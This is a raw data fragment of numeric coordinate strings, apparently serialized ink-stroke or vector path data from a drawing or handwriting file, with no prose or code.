0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 0 0,0 1 0,1-1 0,-1 1 0,0 0 0,15 22 349,-13-19-255,-2-2-103,1 1 0,-1-1 0,0 0-1,0 0 1,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0-1,0 0 1,0-1 0,2 4 0,-1-3-6,-1-1 0,0 1 0,0 0 1,0 0-1,0 0 0,0-1 0,-1 1 1,1 0-1,-1 0 0,1 0 0,-1 0 0,1 0 1,-1 4-1,11 25 143,-1 11-40,1 7 40,0-8-64,-11-39-86,1 1 0,-1 0 0,1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,1 0 0,1 3 0,7 19 30,-10-21-31,0-1 0,1 0 0,-1 1-1,1-1 1,0 1 0,0-1-1,0 0 1,0 0 0,0 0-1,3 4 1,-3-4-1,0 0 0,0 0 0,1 0 0,-1 0-1,-1 0 1,1 0 0,0 0 0,0 1 0,-1-1 0,1 4-1,31 48 108,-31-53-104,-1 1-1,1-1 0,0 0 1,-1 0-1,1 0 1,0 0-1,-1 0 1,1 0-1,0 0 0,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,2 0 0,-2-1-2,0 1 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 0-1,0 0 1,-1 1 0,1-1 0,0 2 0,10 45 140,-1-19 48,-10 22-1,11-27-150,-11-23-38,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,1 1 0,-2-1-1,1-1 0,-1 0 1,0 1-1,1-1 0,-1 0 1,0 1-1,0-1 0,0 0 0,1 1 1,-1-1-1,0 0 0,0 1 1,0-1-1,0 1 0,0-1 1,0 0-1,0 1 0,0-1 1,0 1-1,0-1 0,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,0 1 0,0-1 1,0 0-1,0 1 0,-1-1 1,1 1-1,2 6 98,-2-7-99,1 0 0,-1 0 1,1 0-1,-1 1 0,1-1 1,-1 0-1,0 0 0,1 1 1,-1-1-1,1 0 1,-1 1-1,0-1 0,1 0 1,-1 1-1,0-1 0,1 1 1,-1-1-1,0 0 0,0 1 1,1-1-1,-1 1 1,0-1-1,0 1 0,0-1 1,0 1-1,0-1 0,1 1 1,-1-1-1,0 1 0,0-1 1,0 1-1,0-1 1,-1 1-1,1-1 0,0 1 1,0-1-1,0 1 0,-1 0 1,1 2-6,-1 0 1,1 1-1,0-1 1,0 0 0,0 0-1,0 0 1,0 1-1,1-1 1,1 5-1,-2-8 6,0 0 0,-1 1 0,1-1 0,0 0-1,0 0 1,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0 0,0 1-1,0-1 1,0 0 0,1 0 0,-1 0 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,1 0 0,-1 1 0,0-1 0,0 0-1,0 0 1,0 0 0,0 0 0,0 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0 0,1 0-1,-1 0 1,0 0 0,0 0 0,0 0 0,0 0 0,1 0-1,-1 0 1,0 0 0,0 0 0,0 0 0,0 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,1 0 0,-1 0 0,0 0-1,0 0 1,4 13 48,-4-12-45,0 0-5,0 3 2,0-3 38,2-14 28,4 9-61,8-3-18,3 0 9,-16 5 1,1 1 0,-1 0 0,1 0 1,0 0-1,-1 0 0,1 1 0,0-1 0,0 0 0,-1 1 0,1-1 1,0 1-1,0-1 0,0 1 0,2 0 0,48-6 45,34 0-16,-76 5-29,0-1 1,0 0-1,-1 0 1,1-1-1,-1-1 1,18-7-1,-26 10 2,0 0 0,0 1 1,0-1-1,0 1 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0 0 1,0 0-1,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,0 1 0,0-1 1,0 1-1,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,1 1 0,7 5-15,9 0 15,-16-7 7,0 0-3,5 0-4,-3 0 3,5 0-3,1 0-4,23 6 13,-31-6-10,0 0-1,1 0 1,-1 1-1,0-1 1,0 1-1,0-1 1,1 1-1,-1 0 0,0 0 1,0 0-1,0 0 1,3 2-1,16 5-2,-7 3 9,-12-9-8,-1-2 3,16-6-29,2 6 73,-18 0-43,-1 0 1,1 0-1,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 1,1 0-1,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,0 0 0,1 0 1,-1-1-1,0 1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,0 0 0,0-1 0,1 1 1,-1 0-1,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,2 1-3,5 0 3,-5 0 14,21 6-13,-22-3 0,29-6-6,-18-2-3,-3 4 8,0 1 1,-5 0 2,3 0 0,-5 0-6,0 0-1,5 0 2,-5 0 23,0 0-23,5 0 1,-5 0-3,-1 0 4,7 0 4,-7 0-1,23 0-35,-17 0 34,-5 0 5,10 5-43,-5-4 35,47 11 62,-52-12-53,0 13 76,27-14 330,-28 1 565,-1-1-774,0 2-154,-23 10-1838,14-5 985,8-5 282,-1 0-1,0 0 1,0 0 0,0 0-1,0 0 1,0 0-1,-1 0 1,1 0 0,0-1-1,0 1 1,-1-1-1,1 0 1,0 0 0,0 0-1,-1 0 1,1 0-1,0 0 1,-5-1 0,-23 0-6780,19 1 3449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16 52,'-2'-11'3932,"-1"10"-3800,3 0 38,-1 1 1,1 0-1,-1-1 1,1 1 0,-1 0-1,1 0 1,-1-1-1,1 1 1,-1 0-1,1 0 1,-1 0-1,0 0 1,1 0-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0-1,0 0 1,1 0-1,-1 0 1,1 0-1,-1 1 1,1-1 0,-1 0-1,1 0 1,-1 1-1,1-1 1,-1 0-1,0 1 1,4 2-50,-3-3 32,0 0 1,-1 0 0,1 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,-1 1 462,1-1-462,0 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,2 36 1135,0-32-1241,-1 0 0,1 0 0,-1 0-1,0 0 1,0 1 0,0-1 0,-1 1 0,1 5 0,7 31 248,-7-36-265,0-1 1,0 0-1,0 1 1,0-1-1,-1 1 1,0-1-1,0 1 0,0 6 1,-1-8-14,1 1 0,0 0 0,0-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,1 1 0,0-1 0,3 7 0,-3-5 5,0 0-1,0 0 1,0 0-1,-1 1 1,1-1-1,-1 0 1,0 0-1,-1 0 1,0 6-1,-1 9 38,-8 25 7,10-41-71,0 0 7,0 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,0 0-1,0 0 1,0-1-1,-3 8 0,-7 42 10,8-47-8,1 1 0,0-1 1,0 1-1,0 0 0,1-1 1,0 1-1,1 0 0,-1 0 0,2 13 1,-1-9-4,-11 27 131,1 10-43,-1-6-159,11-40 76,0 1 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 1 0,-1-1-1,1 1 1,-1-1 0,0 0 0,0 1 0,0-1 0,-2 3 0,2-2-4,0-1 0,0 1 0,0-1 0,1 1 1,-1 0-1,1-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,1 3 1,-1-4-5,1 0 1,-1 1 0,0-1 0,0 0 0,0 0 0,0 0-1,0 0 1,0 1 0,0-1 0,-1 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,1 0 0,-1 0 0,-2 2 0,3-2 2,-1-1 0,1 1 1,-1 0-1,1 0 1,-1-1-1,1 1 1,0 0-1,0 0 1,0 0-1,0-1 1,1 1-1,-1 0 1,0 0-1,1-1 1,-1 1-1,1 0 1,-1-1-1,1 1 0,0 0 1,0-1-1,0 1 1,0-1-1,1 2 1,-1-1-2,0 0 1,0 0 0,-1-1-1,1 1 1,-1 0-1,0 0 1,1 0-1,-1 0 1,0-1 0,0 1-1,0 0 1,0 0-1,-1 0 1,1 0-1,-1 3 1,0 0 7,-10 48 7,12-40-22,-1-11 7,1 0 0,-1-1 1,0 1-1,0-1 0,0 1 0,0 0 1,0-1-1,0 1 0,0-1 1,0 1-1,-1-1 0,1 1 0,-1 0 1,1-1-1,-1 1 0,1-1 1,-1 0-1,0 1 0,0-1 0,0 0 1,0 1-1,-2 1 0,3-3 1,0 1-1,-1-1 1,1 0 0,0 1-1,0-1 1,-1 1-1,1-1 1,0 0 0,0 1-1,-1-1 1,1 1-1,0-1 1,0 1 0,0-1-1,0 1 1,0-1-1,0 1 1,0-1 0,0 1-1,0-1 1,0 0-1,0 1 1,0-1 0,0 1-1,0-1 1,0 1-1,0-1 1,1 1 0,-1-1-1,0 1 1,0-1-1,1 1 1,0 0 0,-1 0-1,0 0 1,1 0-1,-1 0 1,0 0 0,0 0-1,1 0 1,-1 0 0,0 0-1,0 0 1,0 0-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0 0,0 0-1,0 0 1,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,0 1 0,-1 2-3,0 0 1,1 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,1 0 0,-1 1-1,1-1 1,0 0 0,0 0-1,2 8 1,-1 13 5,-1-24 1,0 0 5,0 1-11,0-1 0,0 1 1,0-1-1,0 1 1,0-1-1,0 1 0,0 0 1,1-1-1,-1 0 1,1 1-1,-1-1 0,1 1 1,-1-1-1,1 1 1,1 0-1,3 14 11,-5-15 6,-1-1-16,0 0 1,1 0 0,-1 0 0,1 0 0,-1 1 0,1-1-1,-1 0 1,1 0 0,-1 1 0,1-1 0,-1 0 0,1 1-1,-1-1 1,1 1 0,-1-1 0,1 0 0,0 1 0,-1-1 0,1 1-1,0-1 1,-1 1 0,1-1 0,0 1 0,0-1 0,0 1-1,-1 0 1,1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1-1,0 0 1,0 27 12,1-17-37,-3-9 17,-5 3 6,7-4 1,-1-1 1,1 0-1,0 0 1,-1 1-1,1-1 1,0 0-1,0 1 1,0-1-1,-1 1 1,1-1-1,0 0 1,0 1-1,0-1 1,0 0-1,0 1 1,0-1-1,0 1 1,-1-1-1,1 1 1,0-1-1,1 0 1,-1 1-1,0-1 1,0 1-1,0-1 0,0 0 1,0 1-1,0-1 1,0 1-1,1-1 1,-1 1-1,-2 5 58,1-5-48,0 0 1,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1-1,1 0 1,-1 0 0,1 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,-1 1-1,1-1 1,0 0 0,0 1 0,0-1 0,1 0 0,-1 1 0,0 0 0,0 4 7,-3 1 21,2-6-23,0-1 0,1 1 0,-1 0 1,0-1-1,1 1 0,-1 0 0,1 0 0,-1 0 1,1 0-1,0-1 0,-1 1 0,1 0 0,0 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 0 0,1 1 1,-1 51 521,0-52-522,-11-8-151,0-29-4000,6 12 137,4 22 3654,0 0 0,0 0 0,1-1 0,-1 1 0,1 0 0,-1 0 0,1-1 1,0 1-1,0 0 0,0 0 0,0-1 0,1-1 0,6-26-3255,-5 0 94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7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73 648,'-2'-12'4552,"2"12"-4450,-1 0 0,1 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,-1 0 1,1 0-1,0 0 1,-1 0 0,1 0-1,0 0 1,-1 0-1,1 1 1,0-1-1,-1 0 1,1 0-1,0 0 1,-1 1 0,1-1-1,0 0 1,0 0-1,-1 1 1,1-1-1,0 0 1,0 0-1,-1 1 1,1-1-1,0 0 1,0 1 0,0-1-1,0 0 1,0 1-1,-1-1 1,1 0-1,0 1 1,0-1-1,0 0 1,0 1 0,0-1-1,0 1 1,0-1-1,0 0 1,0 1-1,0-1 1,0 0-1,1 1 1,-1-1 0,0 1 589,24 17 3772,-3-16-3717,22-3 27,-18-3-575,0 2 0,0 0 0,1 2 0,-1 0 0,0 2 1,0 1-1,45 10 0,-54-10-65,1 0 0,-1-2 1,1 0-1,21-1 0,-14-1-9,12 2 118,0-2-1,0-1 1,0-2 0,37-9-1,-58 9-155,-5 1-26,-1 0 0,1 1 0,0 0 0,20-1 0,91-3 208,-103 5-179,0-1 0,32-8 0,-12 3 121,-31 6-189,0 0 0,1 0 0,-1-1 0,0 0 0,0 0 0,7-4 0,31-7 43,-41 13-63,0-1 1,0 1-1,0-1 1,-1 1-1,1 0 1,0 1 0,0-1-1,0 1 1,0-1-1,0 1 1,6 3-1,25 3 1,-27-7 6,-5-1-7,15-10-6,-18 11 5,0 0 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 1,0 0-1,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 1 0,1 0 2,0 0 1,0 0-1,0 0 0,0-1 1,0 1-1,0 0 1,1-1-1,-1 0 0,0 1 1,0-1-1,1 0 1,-1 0-1,3 0 0,13 0 2,-16 0-4,0 0 3,-1 0 0,1 0 0,-1 0 1,1 0-1,-1 0 0,1 0 0,-1 0 0,1 0 1,-1-1-1,1 1 0,-1 0 0,1-1 1,-1 1-1,3-2 0,5-1-9,16-5-52,-21 5 51,0 2-3,3 1 9,-5 0 1,0 0 1,0 1-1,1-1 1,-1 0 0,0 1-1,0-1 1,0 1-1,0-1 1,0 1 0,0 0-1,3 2 1,10 1-6,-13-4 13,52 0 29,-45 0-32,-6 0 1,4 0-6,-5 0-7,32 0 49,17 0 464,-50 0-316,-3-1-369,-1 0 0,1 0 0,-1 0 1,1 0-1,-1 0 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 1,0 0-1,1 0 0,-1 1 0,0-1 0,-3 1 0,-23-2-5842,7-5-1117,12 1 3367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9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22 189 516,'0'0'1949,"-21"13"6312,42-9-1119,76 9-5948,-35-12-665,-27 0-132,0-1 0,58-7 1,-59 1-278,0 2 0,38 1 0,132 9 878,-190-7-939,0-1-1,0-1 0,0 1 0,-1-2 1,24-9-1,-20 7 62,0 0 1,28-5 0,-2 4 227,55-16 1,-1 17-329,-85 2-5,1 1 0,0 1 0,22-2 0,-33 4-1,39-12-65,-16 7 66,-21 3-14,0 1-1,0 0 1,0 0 0,0 0-1,0 0 1,0 1-1,1-1 1,4 2 0,185 11 28,-182-11-15,8-1-19,0-2 20,-16 2-12,-1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,0 0 0,1 0 0,-2 0 0,1 0 0,6-3 1,-7 3 2,32-6 19,-25 7-26,0 0 2,-8 1-2,1-1 0,-1 0 1,1 0-1,-1 0 0,1 0 0,-1 0 1,1-1-1,0 1 0,-1 0 0,0-1 1,1 1-1,-1-1 0,1 1 0,-1-1 1,2-1-1,6 1 4,23-1-11,2 3 24,-5 5 28,1-3 0,37 2 0,-65-5-40,21 5 64,-16-11-55,-7 6-12,1-1 0,-1 1 0,0 0-1,1-1 1,-1 1 0,0 0 0,0 0 0,1-1 0,-1 1-1,1 0 1,-1 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,1 1-1,-1 0 1,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0-1,1 0 1,-1 0 0,0 0 0,1 0 0,-1 1 0,1-1 0,-1 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,1 1 0,-1-1-1,0 0 1,1 0 0,-1 1 0,1 0 0,6 0-4,-1 0-6,9-8 62,-11 6-57,20-3 8,-19 2-3,-3 2-1,32-17 36,-32 16-152,-4 1-169,-22 4-1955,22-4 1863,0 0 1,0-1-1,0 1 0,0 0 1,0 0-1,0-1 0,0 0 0,0 1 1,0-1-1,0 0 0,0 0 1,0 0-1,0 0 0,-2-2 0,-39-32-10694,32 23 7307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5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 36,'0'0'7180,"9"-6"-5070,-10 6-1908,0 0 0,0 0 0,0 0 0,1 0 1,-1 1-1,0-1 0,0 0 0,0 0 1,1 0-1,-1 1 0,0-1 0,0 0 0,1 1 1,-1-1-1,0 1 0,1-1 0,-1 1 1,1-1-1,-1 1 0,0-1 0,1 1 0,-1 0 1,1-1-1,0 1 0,-1 0 0,1-1 1,-1 1-1,1 0 0,0-1 0,0 1 0,-1 0 1,1 0-1,0 0 0,0-1 0,0 2 1,30 6 441,13 10-280,-35-16-296,-1 0 0,0 0 0,1-1 0,-1 0 0,1 0 0,-1-1 0,1 0 0,0 0 0,13-2 1,23 0 198,-30 4-127,-12-2-129,-1 1 0,1-1 0,0 1 0,-1-1 1,1 0-1,0 0 0,-1 0 0,1 0 1,0 0-1,-1 0 0,1 0 0,0-1 0,-1 1 1,1-1-1,2 0 0,-3 0-11,-1 1 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1-1 0,-1 1 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 1-1,-1-1 1,1 0 0,-1 0 0,1 1 0,-1-1 0,1 1 0,1-1-7,32-6 39,8 11-47,33-15 333,-75 9-399,6 0 16,-6 1 67,1 0 1,-1 0-1,1 0 1,-1-1 0,1 1-1,-1 0 1,1 0-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 1 1,0-1-1,1 0 1,-1 0 0,1 0-1,-1 1 1,1-1-1,-1 0 1,0 0 0,1 1-1,-1-1 1,0 0-1,1 1 1,-1-1 0,0 1-1,1-1 1,-1 0-1,1 2 1,-1-1 27,1-1-8,7 0-28,-7 1-106,-1-1 111,0 1 0,0-1 0,0 0 0,1 0 1,-1 1-1,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,1 0 1,-1 0-1,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 1,0 0-1,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0-1 0,0 1 1,0 0-1,0 0 0,0 0 0,0-1 0,0 1 0,0-1 1,6 7-2,-6-6 2,0 0 1,0 0-1,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,1 0 1,-1 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 1 1,0-1-1,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 0 0,0 1 0,0-1 0,0-1 8,8 3 14,-4 3-10,4-2-14,-7-6 4,-1 2 80,-10 20 112,10 167-109,10-143-91,-10 182 57,-10-195-23,10 79-60,-11-79-18,11 237 32,-4-260 20,3-6-1,1 0 0,-1-1 0,0 1-1,1 0 1,-1 0 0,1-1 0,-1 1-1,1 0 1,0 0 0,-1 0 0,1 0 0,0-1-1,0 1 1,-1 0 0,1 0 0,0 0 0,0 0-1,0 1 1,0 82 149,4-79-145,-4-4-5,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0-1 0,0 2 0,0-1-9,0 1 33,0-1 0,1 0-1,-1 0 1,0 0 0,0 0-1,0 0 1,0 1-1,-1-1 1,1 0 0,0 0-1,0 0 1,-1 0-1,1 0 1,0 0 0,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,0 0-1,0 0 1,1 0 0,-1 0-1,-1 1 1,0-1-5,2 0-17,0 3-2,0-3-3,0 0-21,0 3 16,0-3 1,-2-2-474,0 1 124,0-1 1,1 0 0,-1 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0-1 0,1 1-1,-1 0 1,1-1 0,0 1 0,0-1-1,-1 1 1,1-1 0,0 0 0,0 0-1,0 1 1,1-1 0,-1 0 0,0 0 0,1 0-1,-1 0 1,0-3 0,-8-16-3825,-2 3 538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0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32,'0'0'780,"-13"6"3238,-1 0 756,-1 0-4137,-17 12-334,30-18-9,-9 7 825,11-6-1095,-1 0 0,0 0-1,0 0 1,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,0 0-1,0-1 1,0 1 0,0-1 0,0 1-1,0-1 1,0 0 0,-1 1 0,1-1-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0 0 0,0 0-1,-1 0 1,0-1 0,-1 4-22,1 0 0,-1 0 1,1 0-1,0 0 0,0 1 1,0-1-1,0 1 0,1-1 1,-1 1-1,0 5 0,-11 16 31,11-22-37,-1 0-1,1 0 1,0 1 0,1-1 0,-1 0 0,0 1-1,1-1 1,0 1 0,0 0 0,0-1 0,0 1-1,1 0 1,-1 0 0,1-1 0,0 7-1,1-9 6,-1 0 0,1 1 0,0-1 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,1 0 0,-1-1 0,0 1 0,0 0-1,1-1 1,-1 1 0,1-1 0,-1 1 0,1-1-1,-1 1 1,1-1 0,-1 0 0,1 0 0,-1 0-1,1 0 1,1 0 0,58 2 129,-51-2-191,42 0 13,-50 0 54,-1-1-3,1 1 0,-1-1 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1-1 0,9-35 24,-10 35-24,-1-1 1,0 0-1,0 0 0,-1 1 1,1-1-1,-1 0 0,0 1 0,0-1 1,0 0-1,0 1 0,-3-5 1,0-12 27,-3-2 178,6 20-149,-1 0 0,0-1-1,0 1 1,0 0 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-5-1 0,5 3-62,-1-1-1,1 2 0,0-1 1,0 0-1,0 0 0,-1 1 1,1-1-1,0 1 0,0-1 0,0 1 1,0 0-1,0 0 0,0 0 1,0 0-1,-2 2 0,-57 21-2933,25-16-4151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0 508,'0'0'2842,"-41"6"3028,15 0-4176,23-4-1625,0 1 1,1-1-1,-1 1 1,0 0-1,1-1 1,-1 1 0,1 0-1,0 0 1,-2 5-1,-8 9 68,11-14-70,0-1-1,0 1 0,1 0 1,-1 0-1,1 0 0,0 0 1,-1 0-1,1 0 0,1 0 0,-1-1 1,0 1-1,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,0-1-1,1 1 0,2 4 1,4 4 34,-7-10-99,-1 0 1,1-1-1,-1 1 1,1 0 0,-1 0-1,1 0 1,0 0-1,-1-1 1,1 1-1,0 0 1,-1-1-1,1 1 1,0 0-1,0-1 1,0 1-1,0-1 1,0 1-1,-1-1 1,2 1 0,6 1 12,0-1 0,0 1 0,0-2 1,0 1-1,0-1 0,0 0 0,0 0 1,0-1-1,0 0 0,0-1 1,-1 1-1,1-2 0,0 1 0,-1-1 1,1 0-1,-1-1 0,0 1 1,0-2-1,-1 1 0,1-1 0,-1 0 1,10-9-1,-14 10 4,0 1 1,-1-1-1,1 0 0,-1 0 1,0-1-1,0 1 0,0 0 1,0-5-1,-1 7 48,0 0 1,0 0 0,0 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,-1 0 1,0 0 0,0 0-1,1 0 1,-1 1-1,0-1 1,0 0-1,-1 1 1,1-1 0,0 0-1,0 1 1,-1 0-1,1-1 1,-1 1-1,0 0 1,-2-2 0,0 1-29,0 0 1,-1 1-1,1-1 1,0 1-1,-1 0 1,1 1-1,0-1 1,-1 1-1,1-1 1,-9 2-1,4 0-109,-1 0 0,1 1 0,0 0 0,-1 0 0,1 1 0,0 0 1,0 0-1,1 1 0,-1 1 0,-15 10 0,4 3-1188,-22 16-8788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2 108,'0'0'1870,"11"-1"616,-11 2-1955,0 42 3906,0 35-2151,4-70-2166,3 7 232,-7-14-222,2 29 687,-1-29-841,0-1 49,0 0 0,-1 0 0,1 1 1,-1-1-1,0 0 0,1 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 1 0,0-1 1,1 1-1,-1-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 1 1,0-1-1,1 1 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 1,-1-1-1,1 1 0,0 0 0,0 0 0,0 0 112,-2 22 1119,-2-21-1181,5 0 72,2 0-153,-1-1 40,-2 0 398,0-2 83,12-5-263,17-6 90,-15 6-170,20 2-42,-28 3-112,1 0 0,-1 0 1,0 0-1,1 1 0,-1 0 0,0 0 0,1 1 1,-1-1-1,0 1 0,12 4 0,-16-4-14,-1 0 0,1 0-1,0-1 1,-1 1-1,1 0 1,0-1 0,-1 1-1,1-1 1,0 1 0,0-1-1,0 0 1,2 0 0,0 1 16,-1-1 0,1 1 0,-1 0 0,1 1 0,-1-1 0,0 0 0,0 1 0,0 0 0,4 2 0,-4-2 14,-1-1 12,21 4 100,-1 1-96,-15-5-50,36-1 268,-41 0-198,39 0 32,13-6 119,-9-7-96,7-10-104,-50 23-24,21-5-45,-16 5 48,-3 4 0,-4-4 0,1 0 1,-1 1 0,0-1-1,1 0 1,-1 0 0,1 1 0,-1-1-1,1 0 1,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,1 0 0,-1-1-1,0 1 1,1 0 0,-1 0 0,1-1-1,-1 1 1,1 0 0,-1-1-1,0 1 1,1-1 0,4-2 42,13-2 55,-15 4-114,1 0 0,-1-1-1,0 1 1,1 0-1,-1 1 1,1-1-1,-1 0 1,1 1-1,-1 0 1,1 0-1,5 1 1,31 5 22,-39-7-12,-1 0 7,1 1-1,-1-1 0,0 1 1,0-1-1,1 1 0,-1 0 1,0-1-1,1 1 0,-1 0 1,0-1-1,1 1 0,-1 0 0,1-1 1,-1 1-1,0 0 0,1-1 1,-1 1-1,1 0 0,-1 0 1,1 0-1,-1 0 0,1-1 1,-1 1-1,1 0 0,-1 0 1,1 0-1,-1 0 0,1 0 0,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 1-1,1-1 0,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 1-1,1-1 0,-1 0 1,1 1-1,1 0-1,0-1 1,0 1 0,0-1-1,1 0 1,-1 0-1,0 0 1,0 0 0,0 0-1,0 0 1,1-1 0,-1 1-1,0 0 1,3-2-1,11 0 28,1 5-53,-15-3 86,15 0 110,-15 0-332,6 0 95,-7 0 69,-1 0 1,0 1 0,1-1 0,-1 0 0,1 0 0,-1 0-1,1 0 1,-1 0 0,1 0 0,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0-1,1 0 1,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0-1,0 0 1,1 0 0,-1-1 0,1 1 0,-1 0 0,0-1-1,1 1 1,-1 0 0,0-1 0,0 1 0,1-1 0,-1 1-1,0 0 1,1-1 0,-1 0 10,-8 5-144,8-3 46,-1-1 1,0 1-1,0 0 1,1-1-1,-1 1 1,0 0-1,0-1 1,0 1-1,0-1 1,0 0-1,0 1 0,0-1 1,0 0-1,1 1 1,-1-1-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0-1-1,-2 1 1,-63-24-13410,46 18 10277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1 120,'0'0'3684,"22"11"-254,-22-10-3083,1-2-164,0 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,0 1 0,1-1-1,-1 0 1,1 1 0,-1-1 0,0 1 0,1 0 0,-1-1 0,1 1-1,-1 0 1,1 0 0,-1 0 0,3 0 0,31-2 2393,-30 2-2386,0-1 0,-1 2 0,1-1 0,0 1 0,0-1 0,-1 1-1,1 0 1,0 1 0,-1-1 0,1 1 0,-1 0 0,1 0 0,4 4 0,0-1-14,-4-3-134,0-1 0,0 1 0,0-1 0,0 0 0,1 0 0,-1-1 0,0 0 0,9 0 0,37 4 378,-48-3-389,0 0-1,0-1 1,1 0-1,-1 0 0,0 0 1,0 0-1,1 0 1,-1 